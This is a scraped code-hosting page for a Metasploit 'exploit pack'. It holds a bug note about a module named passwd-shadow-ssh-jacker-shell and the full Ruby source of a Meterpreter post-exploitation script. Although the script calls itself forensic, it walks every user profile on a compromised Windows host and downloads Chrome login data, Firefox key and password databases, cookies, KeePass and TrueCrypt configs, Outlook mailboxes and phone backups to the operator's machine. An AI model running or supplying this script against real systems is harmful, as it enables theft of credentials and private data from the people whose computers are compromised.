pwnwiki / q Goto Github PK
View Code? Open in Web Editor NEWExploit Pack for Metasploit - Collection of modules gathered across time and internets
Exploit Pack for Metasploit - Collection of modules gathered across time and internets
xx
xx
passwd-shadow-ssh-jacker-shell.rb
seems to be missing an extra keyword 'end' at line 76
[-] WARNING! The following modules could not be loaded!
[-] /opt/metasploit/msf3/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb: SyntaxError /opt/metasploit/msf3/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb:76: syntax error, unexpected $end, expecting keyword_end
_snip_
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
adding the 'end' resolves the issue
Source: http://www.rhinosecuritylabs.com/wp-content/uploads/2013/08/forensic_scraper
# $ Id: forensic_scraper.rb 1 2013-07-16 nicolio $
# $ Revision: 1 $
#
# Nicole's original script - July 16, 2013
# Naomi edits - July 24 - Aug 8, 2013
#
# Method to filter out the file extensions we want to include in specific paths
# Returns true if the file should be downloaded, false otherwise
#
def filter_extensions(path)
#
# Extensions:
#
#itunes extension types
itunes_paths = ['\Application Data\Apple Computer\MobileSync\Backup', '\AppData\Roaming\Apple Computer\MobileSync\Backup']
itunes_extensions = [".plist", ".mdbackup", ".mddata", ".mdinfo"]
#outlook extensions
outlook_paths = ['\AppData\Local\Microsoft\Outlook']
outlook_extensions = [".ost"]
#safari extensions
safari_paths = ['\AppData\Local\Apple Computer\Safari\Webpage Previews']
safari_extensions = [".png"]
#chrome prefix
chrome_paths = ['\AppData\Local\Google\Chrome\User Data\Default']
chrome_prefix = ["History Index"]
#firefox files
firefox_paths = ['\AppData\Roaming\Mozilla\Firefox\Profiles']
firefox_files = ["key3.db",
"addons.sqlite",
"signons.sqlite",
"places.sqlite",
"cookies.sqlite",
"formhistory.sqlite",
"downloads.sqlite",
"extensions.sqlite",
"content-prefs.sqlite",
"sessionstore.js"]
#windows files
windows_paths = ['\AppData\Roaming\Microsoft\Windows\Recent']
#temp files
temp_paths = ['\AppData\Local\Temp']
temp_extensions = [".tmp", ".cvr", ".TMP"]
#blackberry files
bb_paths = ['\Program Files\Research in Motion']
bb_extensions = ['.ipd']
#printer files
printer_paths = ['\Windows\System32\spool\PRINTERS']
printer_extensions = ['.spl']
#prefetch files
prefetch_paths = ['\Windows\Prefetch']
prefetch_extensions = ['.pf']
#check itunes
for i in 0 ... itunes_paths.length
if (path.include?(itunes_paths[i]))
for j in 0 ... itunes_extensions.length
if (path.include?(itunes_extensions[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check outlook
for i in 0 ... outlook_paths.length
if (path.include?(outlook_paths[i]))
for j in 0 ... outlook_extensions.length
if (path.include?(outlook_extensions[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check safari
for i in 0 ... safari_paths.length
if (path.include?(safari_paths[i]))
for j in 0 ... safari_extensions.length
if (path.include?(safari_extensions[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check chrome
for i in 0 ... chrome_paths.length
if (path.include?(chrome_paths[i]))
for j in 0 ... chrome_prefix.length
if (path.include?(chrome_prefix[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check firefox
for i in 0 ... firefox_paths.length
if (path.include?(firefox_paths[i]))
for j in 0 ... firefox_files.length
if (path.include?(firefox_files[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check windows
for i in 0 ... windows_paths.length
if (path.include?(windows_paths[i]))
if File.file?(path)
return true
end
if path.match('CustomDestinations$') || path.match('AutomaticDestinations$')
return true
end
return false #the filename was not a file
end
end
#check temp
for i in 0 ... temp_paths.length
if (path.include?(temp_paths[i]))
for j in 0 ... temp_extensions.length
if (path.include?(temp_extensions[j]))
return false
end
end
return true
end
end
#check blackberry
for i in 0 ... bb_paths.length
if (path.include?(bb_paths[i]))
for j in 0 ... bb_extensions.length
if (path.include?(bb_extensions[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check printer
for i in 0 ... printer_paths.length
if (path.include?(printer_paths[i]))
for j in 0 ... printer_extensions.length
if (path.include?(printer_extensions[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#check prefetch
for i in 0 ... prefetch_paths.length
if (path.include?(prefetch_paths[i]))
for j in 0 ... prefetch_extensions.length
if (path.include?(prefetch_extensions[j]))
return true
end
end
return false #matched the path, but no extension
end
end
#we didn't match any of the paths - accept download
return true
end
#
# Main Program
#
#
# Default Values
#
dest_folder = "/root/.msf4/loot/forensic_scraper_results"
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Presents the help menu"],
"-w" => [ false, "The folder to save the relevant files found (default is /root/.msf4/loot/forensic_scraper_results)"]
)
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_line("This script finds and downloads relevant files on the remote computer for forensic purposes.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-w"
dest_folder = val
end
end
dest_folder = dest_folder + "/" + client.sys.config.sysinfo['Computer']
#
# Important Variables
#
#these are the possible places users might be stored
user_finder_path_temp = ["\Users\\","\Documents and Settings\\"]
#this is the target directory, in case stuff isn't on the c drive and we want to look other places later
target_directory = 'C:\\'
#this is a list of directories that we do not want to follow
user_entries_disallow = [".", "..", "Default User", "desktop.ini"]
#
# Grabbing All Users
#
#these will hold everything we find
user_entries_temp = []
user_entries = []
user_finder_path = []
for index in 0 ... user_finder_path_temp.length
#if error going to target dir catch
begin
client.fs.dir.chdir(target_directory)
rescue
print_error("Something is wrong with accessing the " + target_directory + " drive.")
raise Rex::Script::Completed
end
#if error opening dir take it out of places we're looking for users later
begin
user_entries_temp = client.fs.dir.entries(user_finder_path_temp[index])
user_finder_path << user_finder_path_temp[index]
rescue
#nothing needs to be done
end
end
#take out the irrelevant paths listed in Important Variables
for index in 0 ... user_entries_temp.length
if !user_entries_disallow.include?(user_entries_temp[index])
user_entries << user_entries_temp[index]
end
end
#
# File and Directory Listings
#
#here are all the additional paths to try.
addl_path_data = [
# Internet Explorer
['\Cookies\index.dat', "ie"],
['\Local Settings\History\History.IE5\index.dat', "ie"],
['\Local Settings\Temporary Internet Files\Content.IE5\index.dat', "ie"],
['\UserData\index.dat', "ie"],
['\Roaming\Microsoft\Windows\Cookies\index.dat', "ie"],
['\Roaming\Microsoft\Windows\Cookies\Low\index.dat', "ie"],
['\Local\Microsoft\Windows\History\History.IE5\index.dat', "ie"],
['\Local\Microsoft\Windows\History\History.IE5\Low\index.dat', "ie"],
['\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat', "ie"],
['\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat', "ie"],
['\Roaming\Microsoft\Internet Explorer\UserData\index.dat', "ie"],
['\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat', "ie"],
# KeePass
['\AppData\Roaming\KeePass\KeePass.config.xml', "keepass"],
# TrueCrypt
['\AppData\Roaming\TrueCrypt\Configuration.xml', "truecrypt"],
['\AppData\Roaming\TrueCrypt\Favorite Volumes.xml', "truecrypt"],
# Safari
['\AppData\Local\Apple Computer\Safari\Cache.db', "safari"],
['\AppData\Local\Apple Computer\Safari\Webpageicons.db', "safari"],
['\AppData\Roaming\Apple Computer\Safari\Bookmarks.plist', "safari"],
['\AppData\Roaming\Apple Computer\Safari\History.plist', "safari"],
['\AppData\Roaming\Apple Computer\Safari\LastSession.plist', "safari"],
['\AppData\Roaming\Apple Computer\Safari\TopSites.plist', "safari"],
# Chrome
['\AppData\Local\Google\Chrome\User Data\Default\Archived History', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\Cookies', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\Current Tabs', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\History', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\Login Data', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\Visited Links', "chrome"],
['\AppData\Local\Google\Chrome\User Data\Default\Web Data', "chrome"]
]
#so far we have direct paths... but some we want to scrape for all possible files
dirs_of_interest =[
# Internet Explorer
['\AppData\Local\Microsoft\Windows\Temporary Internet Files', "ie"],
['\AppData\Roaming\Microsoft\Windows\Cookies', "ie"],
['\Application Data\Local\Microsoft\Windows\Temporary Internet Files', "ie"],
['\Local Settings\History', "misc windows"],
['\Local Settings\Temporary Internet Files', "ie"],
['\AppData\Roaming\Microsoft\Windows\Recent', "misc windows"],
['\AppData\Roaming\Microsoft\Windows\Network Shortcuts', "misc windows"],
['\AppData\Local\Temp', "temp"],
['\Local\Microsoft\Windows\History\History.IE5\index.dat', "ie"],
['\Local\Microsoft\Windows\History\History.IE5\Low\index.dat', "ie"],
# Desktop
['\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar', "desktop"],
['\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu', "desktop"],
['\Local Settings\History\History.IE5', "desktop"],
# Safari
['\AppData\Local\Apple Computer\Safari\LocalStorage', "safari"],
['\AppData\Local\Apple Computer\Safari\History', "safari"],
['\AppData\Local\Apple Computer\Safari\Webpage Previews', "safari"],
['\AppData\Roaming\Apple Computer\Safari\Cookies', "safari"],
# Chrome
['\AppData\Local\Google\Chrome\User Data\Default', "chrome"],
# Outlook
['\AppData\Local\Microsoft\Outlook', "outlook"],
# iTunes
['\Application Data\Apple Computer\MobileSync\Backup', "itunes"],
['\AppData\Roaming\Apple Computer\MobileSync\Backup', "itunes"],
# MRU
['\Recent', "MRU"],
# Favorites
['\Links', "misc windows"]
]
#also some may require that we go a level deeper
dirs_with_interesting_children = [
# Firefox
['\AppData\Roaming\Mozilla\Firefox\Profiles', "firefox"]
]
#these are directories that contain interesting files
dirs_with_no_username = [
#Blackberry files
['C:\Program Files\Research In Motion', "blackberry"],
#Printer spool files
['C:\Windows\System32\spool\PRINTERS', "printer"],
#Prefetch files
['C:\Windows\Prefetch', "prefetch"]
]
#
# File Searching
#
#making a variable to store all filepaths that are successful
found_files = []
#THE KEY DIFFERENCE IN THIS FOR LOOP IS THAT WE WANT EVERY CHILD FILE OF DIRECTORIES OF INTEREST.
for findex in 0 ... user_finder_path.length
for index in 0 ... dirs_of_interest.length
for ix in 0... user_entries.length
begin
path = target_directory + user_finder_path[findex] + user_entries[ix] + dirs_of_interest[index][0]
#lets give feedback for now.
file_entries = client.fs.dir.entries(path + "\\")
#puts file_entries
for fix in 0 ... file_entries.length
if !user_entries_disallow.include?(file_entries[fix])
if filter_extensions(path + "\\" + file_entries[fix]) #if returns true, then add to list
temp = []
puts 'found ' + path + "\\" + file_entries[fix]
temp.push(path + "\\" + file_entries[fix])
temp.push(dirs_of_interest[index][1])
found_files.push(temp)
end
end
end
rescue
#do nothing but resume
end
end
end
end
#THE KEY DIFFERENCE IN THIS FOR LOOP IS THAT WE ALREADY KNOW THE NAME OF THE FILE WE SEEK.
for findex in 0 ... user_finder_path.length
for index in 0 ... addl_path_data.length
for inner_index in 0 ... user_entries.length
file_path = target_directory + user_finder_path[findex]
file_path = file_path + user_entries[inner_index] + addl_path_data[index][0]
begin
if (client.fs.file.exists?(file_path))
#cat file_path
temp = []
temp.push(file_path)
temp.push(addl_path_data[index][1])
found_files.push(temp)
puts 'found ' + file_path
end
#puts '!!!!!!!!!found data! adding to master list. ' + file_path
rescue => e
puts e.message
#do nothing but resume
end
end
end
end
children_entries = []
#THE KEY DIFFERENCE IN THIS FOR LOOP IS THAT WE WANT TO GO A LEVEL DEEPER AND THEN GET THE ENTRIES
for index in 0 ... dirs_with_interesting_children.length
for missing_ix in 0 ... user_finder_path.length
for ix in 0... user_entries.length
begin
path = target_directory + user_finder_path[missing_ix]
path = path + user_entries[ix] + dirs_with_interesting_children[index][0]
#lets give feedback for now.
#puts 'searching for profiles ' + path
file_entries_temp = client.fs.dir.entries(path)
file_entries = []
for fix in 0 ... file_entries_temp.length
if !user_entries_disallow.include?(file_entries_temp[fix])
file_entries << file_entries_temp[fix]
end
end
#puts '!!!!!!!!!!found some. searching for their children'
for fix in 0 ... file_entries.length
final_dir = path
final_dir = path + "\\" +file_entries[fix]
begin
children_entries = client.fs.dir.entries(final_dir)
for lol in 0...children_entries.length
if !user_entries_disallow.include?(children_entries[lol])
final_child = final_dir + "\\" + children_entries[lol]
if filter_extensions(final_child)
temp = []
temp.push(final_child)
temp.push(dirs_with_interesting_children[index][1])
puts 'found ' + final_child
found_files.push(temp)
end
end
end
rescue Exception => e
puts e.message
puts e.backtrace.inspect
#do nothing but resume
end
end
rescue
#do nothing but resume
end
end
end
end
#Find specific paths outside of the Users or Documents and Settings directories
for index in 0 ... dirs_with_no_username.length
begin
path = dirs_with_no_username[index]
file_entries = client.fs.dir.entries(path + "\\")
#puts file_entries
for fix in 0 ... file_entries.length
if !user_entries_disallow.include?(file_entries[fix])
if filter_extensions(path + "\\" + file_entries[fix]) #if returns true, then add to list
puts 'found ' + path + "\\" + file_entries[fix]
found_files.push(path + "\\" + file_entries[fix])
end
end
end
rescue
#do nothing
end
end
#
# File Downloading
#
#download the files we located
for index in 0 ... found_files.length
#if the found file is actually a directory, then download all the contents
begin
client.fs.dir.download(dest_folder + "/" + found_files[index][1] + "/" + found_files[index][0].gsub("\\", "_"), found_files[index][0], true, true)
print_status "downloading " + found_files[index][0]
rescue ::Rex::Post::Meterpreter::RequestError => e
#if the found file is actually a file, download it
if (e.message.include?("Access"))
print_error e
#do nothing and move on
else
print_status "downloading " + found_files[index][0]
client.fs.file.download_file(dest_folder + "/" + found_files[index][1] + "/" + found_files[index][0].gsub("\\", "_"), found_files[index][0])
end
end
end
xx
Note to self.
Should only affect windows targets.
Changes to CmdStagers upstream will also break any other exploits using these too.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.